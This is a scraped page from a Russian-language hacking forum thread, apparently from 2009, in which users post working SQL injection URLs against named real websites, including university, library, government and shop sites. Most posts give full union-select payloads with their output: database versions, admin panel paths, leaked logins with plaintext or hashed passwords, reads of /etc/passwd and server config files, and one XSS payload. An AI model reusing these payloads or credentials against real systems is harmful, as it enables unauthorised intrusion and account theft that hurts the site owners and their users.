ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7611  
Старый 02.02.2009, 18:43
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,Num,Username,Password),7,8,9,10,11,12,13,14+from+admin_eq--
логин/пасс:
Код:
eimearquinn:ei989uin_eq
Так же пасивная XSS через скуль:

Код:
http://www.eimearquinn.com/shop.php?id=-1+union+select+1,2,3,4,5,<script>alert()</script>,7,8,9,10,11,12,13,14+from+admin_eq--
-----------------------------------------------
The End!
 
Ответить с цитированием

  #7612  
Старый 02.02.2009, 23:54
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

PR 7

http://ed.stanford.edu/suse/faculty/displayFacultyNews.php?tablename=notify1&id=-833+union+select+1,column_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from +information_schema.columns+where+table_name=(0x75 736572)+limit+3,1--
 
Ответить с цитированием

  #7613  
Старый 02.02.2009, 23:57
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

PR: 5
Код:
http://www.chicagoloopalliance.com/about.php?id=-193+union+select+1,2/*
PR: 3
Код:
http://www.kss-windows.com/next.php?id=-22+union+select+1,2/*

Последний раз редактировалось jokester; 03.02.2009 в 00:16.. Причина: palit.biz и mlsoftball.com БОЯНЫ
 
Ответить с цитированием

PR1
  #7614  
Старый 03.02.2009, 00:28
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию PR1

http://www.hqcomputers.ro/produs_detalii.php?id_produs=-829+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8,9,0,1,2,3,4,5,6/*&nume_produs=Imprimanta%20HP%20Color%20Laserjet%2 02605

Database Version: 4.1.22-standard-log
Database name: hqcomputers_ro_bdmag
User name: 11255hqc@localhost


админка
http://hqcomputers.ro/admin/login.php

табелки не подбирал.

Последний раз редактировалось Gorev; 03.02.2009 в 00:33..
 
Ответить с цитированием

  #7615  
Старый 03.02.2009, 00:54
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

Pr 6
http://www.lib.odu.edu/libassist/guide/guide.php?id=-44+union+select+1,2,version(),4,5,6,7,8,9--
5.0.38-Ubuntu_0ubuntu1.4-log
 
Ответить с цитированием

  #7616  
Старый 03.02.2009, 02:30
Аватар для Maestus
Maestus
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651

Репутация: 92
По умолчанию

Ministry of Chittagong Hill Tracts Affairs

Цитата:
http://www.mochta.gov.bd/news_events.php?page_id=5&CATEGORY=1+and+1+union+s elect+1,concat_ws(0x20,username,password,user(),da tabase(),@@version),3,4,1,6,7,8,9,10,11+from+tbl_u ser_access--

[admin panel] http://www.mochta.gov.bd/adminfiles/index.php
username: admin
password: mo7bu53

Database version: 5.0.67-community
Database name: mochtag_cht
User name: mochtag_root@localhost
 
Ответить с цитированием

  #7617  
Старый 03.02.2009, 06:16
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://www.businessinsurance.com/cgi-bin/article.pl?articleId=-26853+union+select+concat_ws(0x3a,user,password,ho st,file_priv),concat_ws(0x3a,user(),version(),data base()),3,4,5,6,7,load_file('/etc/passwd'),9,10,11,12+from+mysql.user--
PR6

Ни админки, ни путей я не нашел, походу база данных и веб сервер на разных хостах находятся.. или хз чо..
Если что у кого выйдет - отпишись в личку хотя бы)
 
Ответить с цитированием

  #7618  
Старый 03.02.2009, 10:06
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Код HTML:
http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17--

Database Version: 5.0.27
Database name: yourprops
User name: admin@localhost


Код HTML:
http://www.yourprops.com/view_item.php?movie_prop=5179879820+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+limit+0,1--
admin : 6632bfb46db6d97e
pma_IiabUsiU1n6q : 6c4572a01bdfb70d
horde : 039b58f6547b38c2
pma_g5Dqcuu61ikC : 60fb772f4a1fa923
pma_AVMLiZ09j6Cb : 05e06de46f9baae2
yourprops : 6632bfb46db6d97e


Читаем /etc/httpd/cpnf/httpd.conf


Код HTML:
http://www.yourprops.com/view_item.php?movie_prop=5179879820+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F6574632F68747470642F636F6E662F68747470642E636F6E66),0x3a),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17--




PageRank 7

Цитата:
http://www.njstatelib.org/News/news_item.php?item_id=117987911+union+select+1,2,c oncat_ws(0x3a,version(),user(),database()),4,5,6,7 ,8--

Database Version: 5.0.45
Database name: wwwnews
User name: njsl_guest@localhost

Админчег


Цитата:
http://www.njstatelib.org/News/news_item.php?item_id=117987911+UNION+SELECT+1,2,C ONCAT(0x3a,(SELECT+CONCAT(adminid,0x3a,username,0x 3a,password,0x3a,tablename)+FROM+wwwuser.admin+LIM IT+0,1),0x3a),4,5,6,7,8--
: 1 : rcampbell : d00key : all



PageRank 7

Цитата:
http://www.roamsecure.net/pressitem.php?news_id=287687767869+union+select+1, 2,3,4,5,6,concat_ws(0x3a,version(),user(),database ()),8,9,10--

Version:5.0.45
User:wsusr@localhost
Database:roamsecure



Цитата:
http://www.ditzdesigns.com/products/item.php?c=13+union+select+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6,7,8,9,10--
Database Version: 5.0.21-community-nt
Database name: henhouse
User name: chicken@localhost

Админ


Цитата:
http://www.ditzdesigns.com/products/item.php?c=13+UNION+SELECT+1,2,3,AES_DECRYPT(AES_E NCRYPT(CONCAT(0x3a,(SELECT+CONCAT(user,0x3a,passwo rd)+FROM+henhouse.admin+LIMIT+1,1),0x3a),0x71),0x7 1),5,6,7,8,9,10--
admin : password


Цитата:
https://www.found412.com/item.php?merch_id=1180987678+union+select+1,concat _ws(0x3a,version(),user(),database()),3,4,5,6,7,8, 9,10,11,12,13--
4.1.22
found412@localhost
found412_com


Цитата:
http://etd.lib.montana.edu/etd/view/item.php?id=456/**/union/**/select/**/1,2,3,4,concat_ws(0x3a,version(),user(),database() )--

Version:4.1.22-log
User:etd_edit@localhost
Database:etd

Последний раз редактировалось spherics; 03.02.2009 в 10:28..
 
Ответить с цитированием

  #7619  
Старый 03.02.2009, 11:25
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.miracol.ro/carte.php?carte=-99+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3--&titlu=Autoinstruire%20in%20parapsihologie


Version: 5.0.67-community-log
Database: :miracol_miracol
User :miracol_miracol@localhost
 
Ответить с цитированием

  #7620  
Старый 03.02.2009, 11:46
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank 6

Цитата:
http://gorillafund.org/conservation/fieldnews_item.php?recordID=997867980+union+select +1,2,3,4,5,6,concat_ws(0x3a,version(),user(),datab ase()),8,9,10,11,12,13,14--
Database Version: 4.1.20
Database name: gorilla
User name: gorillaf_db@localhost


Цитата:
http://gorillafund.org/conservation/fieldnews_item.php?recordID=997867980+union+select +1,2,3,4,5,6,concat_ws(0x3a,user),8,9,10,11,12,13, 14+from+mysql.user+limit+0,1--
admin:7616b862045281be хэш MySQL:7616b862045281be: *test1234
pma_KOSkwHg4RA6O:5685eb1e1d67adf1
horde:6651c48b35b24923
jeff:413a5fe87cbf1d47
gorillaf_db:0dabc23b146d3b17 хэш MySQL:0dabc23b146d3b17: digit
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ